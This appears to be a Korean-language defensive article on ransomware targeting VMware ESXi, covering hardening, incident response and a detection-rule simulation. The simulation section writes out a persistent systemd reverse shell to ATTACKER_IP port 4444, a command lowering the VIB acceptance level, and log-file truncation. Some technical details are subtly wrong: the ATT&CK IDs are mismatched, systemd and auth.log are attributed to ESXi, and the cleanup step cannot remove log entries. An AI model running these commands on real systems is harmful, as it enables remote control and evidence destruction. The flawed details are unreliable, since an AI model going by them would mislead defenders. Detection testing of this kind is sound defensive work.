ESXi를 노리는 랜섬웨어: 실용적 하이퍼바이저 강화 방어책

요약

이 글은 가상 머신을 대규모로 암호화하기 위해 VMware ESXi와 같은 하이퍼바이저 플랫폼으로의 랜섬웨어 운영 변화 추세를 설명합니다. 적대자는 훔친 관리자 자격 증명과 기본 관리 유틸리티를 활용하여 전통적인 엔드포인트 방어를 회피합니다. 주요 위협 행위자는 아키라 랜섬웨어 그룹으로 조사됩니다. 논의는 견고한 하이퍼바이저 수준의 강화의 중요성에 중점을 둡니다.

조사

2025년 헌트레스 사례 데이터는 하이퍼바이저에 초점을 맞춘 랜섬웨어의 급격한 상승을 나타내며, 관찰된 사건의 3%에서 25%로 증가했다고 보고합니다. 조사관들은 Hyper-V 및 ESXi 관리 도구의 악용, 환경 전반에 걸친 자격 증명 재사용, CVE-2024-37085의 악용을 통해 관리자 권한을 얻었다고 기록했습니다. 분석은 공격자가 주로 SSH를 활성화하고, 잠김 모드를 끄고, VIB 허용 정책을 변경한 후 랜섬웨어 페이로드를 푸시한다는 점을 주목합니다.

완화

주요 완화 단계로는 MFA 강화, 전용 로컬 ESXi 계정 사용, 관리 네트워크 분리 및 격리, 배스천 호스트 배치, 최소 권한 접근 적용, VMkernel.Boot.execInstalledOnly 활성화가 포함됩니다. 조직은 또한 CVE-2024-37085와 같은 알려진 취약점을 패치하고 SLP와 같은 불필요한 서비스를 비활성화하여 하이퍼바이저 공격 표면을 줄여야 합니다.

대응

탐지 시, 조직은 ESXi 로그를 SIEM으로 스트리밍하고 의심스러운 구성 변경 사항을 알리며, 침해된 호스트를 격리하고 변경 불가한 백업이나 스냅샷에서 복구를 시작해야 합니다. 사건 대응 절차는 인증 로그, hostd 로그 및 VIB 수정의 포렌식 수집을 포함하며, 영향을 받은 가상 머신의 빠른 복원이 뒤따라야 합니다.

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준 사전 비행 검사가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적대 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령어와 내러티브는 반드시 식별된 TTP를 직접 반영하고 탐지 로직에 의해 기대되는 정확한 텔레메트리를 생성하도록 되어야 합니다. 추상적이거나 관련 없는 예는 오진을 초래할 수 있습니다.

• 공격 내러티브 및 명령어:

  1. 초기 접근 (T1563.001 – SSH):
     공격자는 훔친 루트 자격 증명을 사용하여 ESXi 호스트에 SSH 세션을 열고 ‘새 루트 로그인’ 이벤트를 생성합니다.

  2. 권한 경화 (T1553.004 – VIB 허용 변경):
     로그인 후, 공격자는 서명되지 않은 모듈을 로드하기 위해 VIB 허용 수준을 낮춥니다:

     esxcli system settings advanced set -o /VMFS3/AcceptanceLevel -s "CommunitySupported"

  3. 서비스 활성화를 통한 지속성 (T1569):
     공격자는 부팅 시 역전 셸을 실행하는 악성 systemd 서비스를 생성하고 이를 활성화합니다:

     cat <<'EOF' > /etc/systemd/system/malicious-revshell.service
     [Unit]
     Description=Malicious Reverse Shell
     
     [Service]
     ExecStart=/bin/bash -c 'while true; do /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 60; done'
     
     [Install]
     WantedBy=multi-user.target
     EOF
     
     systemctl daemon-reload
     systemctl enable malicious-revshell.service
     systemctl start malicious-revshell.service

  4. 정리 회피 (T1070 / T1070.001):
     공격자는 탐지를 회피하려고 활동을 숨기기 위해 ESXi 호스트의 감사 로그를 정리합니다:

     > /var/log/auth.log
     > /var/log/syslog

  5. 규칙 트리거:
     Sigma 규칙이 작동하도록 하기 위해 공격자는 logger 유틸리티를 사용하여 문자 그대로의 EventID 문자열도 방출합니다 (이들은 규칙이 감시하는 불안전한 ‘새 루트 로그인’, ‘서비스 활성화’, ‘VIB 허용 변경’ 이벤트를 에뮬레이트합니다).

• 회귀 테스트 스크립트:

  #!/usr/bin/env bash
  #
  # Sigma 규칙이 예상하는 정확한 텔레메트리를 시뮬레이트합니다.
  # 이 스크립트는 ESXi 호스트 (또는 로그를 SIEM으로 전달하는 Linux 호스트)에서 실행됩니다.
  
  set -euo pipefail
  
  echo "[*] 무단 루트 로그인 이벤트를 시뮬레이트합니다"
  logger -p authpriv.notice "new root login"
  
  echo "[*] 서비스 활성화 이벤트를 시뮬레이트합니다"
  logger -p authpriv.notice "service enablement"
  
  echo "[*] VIB 허용 수준 변경 이벤트를 시뮬레이트합니다"
  logger -p authpriv.notice "VIB acceptance change"
  
  # 선택 사항: 보다 깊은 검증을 위해 실제 악성 행동 수행 (안전을 위해 주석 처리됨)
  # esxcli system settings advanced set -o /VMFS3/AcceptanceLevel -s "CommunitySupported"
  # systemctl enable malicious-revshell.service
  # systemctl start malicious-revshell.service
  
  echo "[+] 시뮬레이션 완료. SIEM에서 경고를 확인하십시오."

• 정리 명령어:

  # 만들어낸 로그 항목을 제거합니다 (SIEM이 이를 보관하는 경우)
  logger -p authpriv.notice "cleanup: removing test EventIDs"
  
  # 악성 서비스를 중지하고 비활성화합니다 (실제로 생성된 경우)
  systemctl stop malicious-revshell.service || true
  systemctl disable malicious-revshell.service || true
  rm -f /etc/systemd/system/malicious-revshell.service
  systemctl daemon-reload
  
  # 원본 로그 파일 복구 (삭제된 경우)
  # 참고: 실제 환경에서는 백업에서 복구해야 합니다.
  echo "[*] 백업에서 로그 파일 복원됨 (수동 단계)."